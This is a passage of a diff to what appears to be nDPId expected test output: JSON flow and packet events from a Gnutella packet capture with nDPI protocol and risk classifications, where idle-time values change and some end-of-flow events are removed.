+00871{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1972,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":333,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":114930,"flow_last_seen":115040,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":533,"flow_tot_l4_payload_len":533,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":115040,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"69.118.162.229","src_port":50327,"dst_port":46906,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1974,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":334,"flow_packet_id":2,"flow_last_seen":115124,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":115124,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsBeQAAEAGYvO9k0hTCgACD2X8xJgA9CQBhHBOQWAS\/\/9j5QAAAgQFtA=="} +00441{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1975,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":334,"flow_packet_id":3,"flow_last_seen":115126,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":115126,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoz\/tAAIAGGN8KAAIPvZNIU8SYZfyEcE5BAPQkAlAQ+vCAsQAA"} +00870{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1976,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":114930,"flow_last_seen":115127,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":538,"flow_tot_l4_payload_len":538,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":115127,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"189.147.72.83","src_port":50328,"dst_port":26108,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00563{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1980,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":335,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":115369,"flow_last_seen":115369,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":115369,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"14.200.255.229","src_port":28681,"dst_port":37058,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1980,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":335,"flow_packet_id":1,"flow_last_seen":115369,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":115369,"pkt":"UlQAEjUCCAAn5uVZCABFAAA4ticAAIARadEKAAIPDsj\/5XAJkMIAJDeaLGAxAs8iaaH\/Df9W3JltAwABAAUAAADDglFLQA=="} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1982,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":335,"flow_packet_id":2,"flow_last_seen":115702,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":88,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":88,"pkt_l4_len":54,"thread_ts_msec":115702,"pkt":"CAAn5uVZUlQAEjUCCABFAABKBegAAEARWf8OyP\/lCgACD5DCcAkANl\/hLGAxAs8iaaH\/Df9W3JltAwEBABcAAADCkA7I\/+WyNgAAAAAgAMOCUUtEGERIlw=="} @@ -1153,11 +1153,11 @@ 00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2125,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":344,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":124090,"flow_last_seen":124090,"flow_idle_time":180000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":124090,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"207.38.163.228","src_port":28681,"dst_port":6778,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2125,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":344,"flow_packet_id":1,"flow_last_seen":124090,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":124090,"pkt":"UlQAEjUCCAAn5uVZCABFAABtN+oAAIARg3wKAAIPzyaj5HAJGnoAWUl8GqIxAsDHb8ARC\/TCVyKtTkQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAIek2ZxoyMuuDPvZIwnux4CwuAqS"} 01408{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2126,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":340,"flow_packet_id":2,"flow_last_seen":124181,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":124181,"pkt":"CAAn5uVZUlQAEjUCCABFAALzBkkAAEARxyomjnfqCgACD8JEcAkC3z99SEIxAiBrw4qXLe42xzCJ9UQAAMACAAAGR1RLRwAAjVz9Bf0jf1LZ5zMd\/xsbFCoGHdIEJo536sJEAQAAAAT9X3JyFEdUS0cAAIQFsf+Bv2njsZMOcK5XBzk5Qq3rBN3GzcRRKkdUS0cAAIPPdMtTw3ywAQrcKHskULaFt8T9BFd7NurTckdUS0cAAIBDDfCNVDqFgBWTNBe\/R1a2V7AXBLm7Sq3Q8VdTSFIAAIsML3baZ9qjEzov01XuwUWPp8CvBBiB6TxOFldTSFIAAIgInuBYn2DWNYTpgSOhE3nGOSSqBGLQGpoTgldTSFIAAJMpLUy99S6l5+o3G\/7HZbY0zUPGBFnUW5sUS1NOT1cAAJJLJdecP9uDvZhuUeP7MwcedtuWBM8mo+QaekdUS0cAAJ6Xxzbx1oA8a67zMFTEYzHds+ukBEziVWkYyldTSFIAAJ7Bez1ZQQgPxovuLAykgS8CMrDdBLAKqQox\/0dUS0cAAJp\/6ofTpH0Z7c9sfONgy\/6jjg5ZBFTFYV4FUFdTSFIAAJgFqYyWS9v2Yq4KyYrmzTVJWc5SBGP6\/WMuK0dUS0cAAKZeyrvsa5mvejLQ38QnOIQ2zbdtBGQB54rc7ldTSFIAAKQeYlqSZYffwoHRlw8bFrfmBFSvBFQcNeGvO0dUS0cAAK10JPaTOb0hgYkPVi8cpzY7gtJoBFx1+WIan1dTSFIAAKr7G8iP9T\/W+jUmPMkpEJiqR57KBMvcaRtLPEdUS0cAALd6AZ7svQKtiRxAHRTzpxSemu\/LBNXlb+ATDEdUS0cAALSr6ArQaneMzMJ81PWuqjO12gqLBLV2NdR1LkdUS0cAALNy1PV19iuZm7NzjEzMA6wUOO22BFJALAsFSEdUS0cAALFbZ+HgSIrho0RaGRNTd1qTgMZFBC0fmHBo40dUS0cAAL1cZVAaZZhJTOPlkpw6jfT8aYRtBD\/kr6kHkA=="} -00560{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2164,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":126831,"flow_last_seen":126831,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":126831,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"69.118.162.229","src_port":50330,"dst_port":46906,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2164,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":345,"flow_packet_id":1,"flow_last_seen":126831,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":126831,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0bCBAAIAGmjkKAAIPRXai5cSatzq0d6IdAAAAAIAC+vCtSgAAAgQFtAEDAwgBAQQC"} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2165,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":345,"flow_packet_id":2,"flow_last_seen":126943,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":126943,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsBmMAAEAGf\/9FdqLlCgACD7c6xJoBCaABtHeiHmAS\/\/8wNgAAAgQFtA=="} -00440{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2166,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":345,"flow_packet_id":3,"flow_last_seen":126943,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":126943,"pkt":"UlQAEjUCCAAn5uVZCABFAAAobCFAAIAGmkQKAAIPRXai5cSatzq0d6IeAQmgAlAQ+vBNAgAA"} -00871{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2167,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":126831,"flow_last_seen":126944,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":513,"flow_tot_l4_payload_len":513,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":126944,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"69.118.162.229","src_port":50330,"dst_port":46906,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00560{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2164,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":126831,"flow_last_seen":126831,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":126831,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"69.118.162.229","src_port":50330,"dst_port":46906,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2164,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":345,"flow_packet_id":1,"flow_last_seen":126831,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":126831,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0bCBAAIAGmjkKAAIPRXai5cSatzq0d6IdAAAAAIAC+vCtSgAAAgQFtAEDAwgBAQQC"} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2165,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":345,"flow_packet_id":2,"flow_last_seen":126943,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":126943,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsBmMAAEAGf\/9FdqLlCgACD7c6xJoBCaABtHeiHmAS\/\/8wNgAAAgQFtA=="} +00440{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2166,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":345,"flow_packet_id":3,"flow_last_seen":126943,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":126943,"pkt":"UlQAEjUCCAAn5uVZCABFAAAobCFAAIAGmkQKAAIPRXai5cSatzq0d6IeAQmgAlAQ+vBNAgAA"} +00871{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2167,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":126831,"flow_last_seen":126944,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":513,"flow_tot_l4_payload_len":513,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":126944,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"69.118.162.229","src_port":50330,"dst_port":46906,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00561{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2197,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":346,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":129174,"flow_last_seen":129174,"flow_idle_time":180000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":129174,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"76.226.85.105","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2197,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":346,"flow_packet_id":1,"flow_last_seen":129174,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":129174,"pkt":"UlQAEjUCCAAn5uVZCABFAABtuPMAAIAR0zIKAAIPTOJVaXAJGMoAWVtEeBkxArN0R\/zFhR7fMHiNqUQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAIek2ZxoyMuuDPvZIwnux4CwuAqS"} 00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2198,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":347,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":129174,"flow_last_seen":129174,"flow_idle_time":180000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":129174,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.10.169.10","src_port":28681,"dst_port":12799,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} @@ -1283,21 +1283,6 @@ 00561{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2817,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":368,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":174343,"flow_last_seen":174343,"flow_idle_time":180000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":174343,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"47.147.52.21","src_port":28681,"dst_port":36728,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00544{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2817,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":368,"flow_packet_id":1,"flow_last_seen":174343,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":128,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":128,"pkt_l4_len":94,"thread_ts_msec":174343,"pkt":"UlQAEjUCCAAn5uVZCABFAAByuwkAAIARD7sKAAIPL5M0FXAJj3gAXq06x7YxAq8Sv7XsAP61JE4GfUQAAD8AAAAHR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAF3Q\/QP6n0+w02aNGZLhtNuwNXioAEFMT0M="} 01407{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2827,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":367,"flow_packet_id":2,"flow_last_seen":174648,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":174648,"pkt":"CAAn5uVZUlQAEjUCCABFAALzB\/MAAEARKy2VHKOvCgACD8MkcAkC37mfNNYxAkNtQBP87WWbzy94OkQAAMACAAAGR1RLRwAAQTW8kBkL86J3th0pUYoQZu1JqkUElRyjr8MkAQAAAAThq6+iFEdUS0cAAFxg+taEWAYB1unX7flSWQRG3beNBGic4kjQCkdUS0cAAFuWTCQAv7KdBMgSGC6mmSLY5\/ECBMKjtH4qSVdTSFIAAFpCOi4aZIiG9lYEyciBumqkMMTzBMY62gy7KEdUS0cAAFf2jq05FgyfJOGIcRJLg6NdtQ1eBLw9NLcuTEdUS0cAAFYaYH8fxSMCFJGx6KJ1XnlYMcAbBL7A0rYaYkdUS0cAAFFI2BA3K8AVe0IqJAEnw9\/D630lBI6EpQ13ZkdUS0cAAFITSOd3gRniYdJwpHJZH2SZ8zLzBFaBxFQmu1dTSFIAAEwNRRSjJbzqx43c9rTKLbxkbHgKBF4IN57HxEdUS0cAAElxJg9dajjzW3txW7a4q7j8IGI0BFHNWy2VmVdTSFIAAEJDtkelhifx87ftq707Fzo\/U0PdBC+TNBWPeEdUS0cAAGqU5DC0wpx7Tt\/+AtuQJkODlGIrBC\/cuoxr+UdUS0cAAGSQPhJYYczqO9fA1uqwCWebPjcpBMEgftbozEdUS0cAAGfwY9tAxh1AXF0ZU2EOIfqDQ08tBHbwRccYzEdUS0cAAGcZJHUoqfb+iSo9+1Aaw4nAX4zABFAH\/MAa6EdUS0cAABnDsbPWKLbuWCN54AyWtjRM+4cSBFlLNBOzukdUS0cAABjf5v+Urk90V\/WPMxinQSIciE4\/BDzxMMJTNUdUS0cAABiF4URzeX7Vdi93GjTzJphEA0s1BC6AcmsZsldTSFIAABreJpDCEhk5HaHmWa2KZ2KgQT+tBFLZsDQdFkdUS0cAABpaaFBDXGgpcSmxYhITGidbcBteBEuFZV3Mj0dUS0cAABZMZh8YJqCRZ8rsFWpJujOrF1VMBFHNWy2cyQ=="} -00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2959,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":63000,"flow_last_seen":63524,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":1137,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":181645,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"218.250.6.59","src_port":50196,"dst_port":12556,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00794{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2959,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":64032,"flow_last_seen":64562,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":181645,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"175.181.156.244","src_port":50206,"dst_port":8255,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2959,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":69141,"flow_last_seen":69581,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":1141,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":181645,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"182.155.242.225","src_port":50232,"dst_port":15068,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2959,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":68108,"flow_last_seen":68639,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":1147,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":181645,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"116.241.162.162","src_port":50226,"dst_port":15677,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2959,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":64030,"flow_last_seen":65583,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":181645,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"61.238.173.128","src_port":50202,"dst_port":57648,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00557{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2959,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":64030,"flow_last_seen":65583,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":181645,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"61.238.173.128","src_port":50202,"dst_port":57648,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2959,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":63001,"flow_last_seen":63616,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1136,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":181645,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"118.168.15.71","src_port":50197,"dst_port":3931,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2959,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":67093,"flow_last_seen":69216,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":181645,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"119.14.143.237","src_port":50222,"dst_port":6523,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00556{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2959,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":67093,"flow_last_seen":69216,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":181645,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"119.14.143.237","src_port":50222,"dst_port":6523,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2959,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":67092,"flow_last_seen":69473,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":181645,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.233.196.226","src_port":50220,"dst_port":3820,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00556{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2959,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":67092,"flow_last_seen":69473,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":181645,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.233.196.226","src_port":50220,"dst_port":3820,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2959,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":64031,"flow_last_seen":64521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1140,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":181645,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"61.222.160.99","src_port":50203,"dst_port":18994,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 